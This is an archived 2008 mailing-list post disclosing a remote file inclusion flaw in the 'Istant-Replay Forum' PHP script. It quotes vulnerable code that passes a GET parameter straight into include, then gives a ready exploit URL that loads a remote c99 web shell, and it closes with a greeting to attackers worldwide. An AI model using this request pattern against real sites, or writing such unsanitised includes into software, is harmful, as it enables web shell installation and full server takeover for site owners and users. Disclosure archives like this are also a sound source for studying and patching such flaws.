remote file include
- From: win32.exe@xxxx
- Date: 15 Apr 2008 19:13:42 -0000
#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################
## AUTHOR: THuGM4N
## Email : Win32.exe@xxxx
## Script : Istant-Replay Forum
## Site : http://www.chattaitaliano.com
## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];
$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## BUT THE EXPLOIT IS LIKE THAT :
http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?
## BIGUP 2 All Attackers Around The World .
#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################
- Prev by Date: iDefense Security Advisory 04.14.08: ClamAV libclamav PE WWPack Heap Overflow Vulnerability
- Next by Date: DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )
- Previous by thread: remote file include
- Next by thread: iDefense Security Advisory 04.14.08: ClamAV libclamav PE WWPack Heap Overflow Vulnerability
- Index(es):
Relevant Pages
|
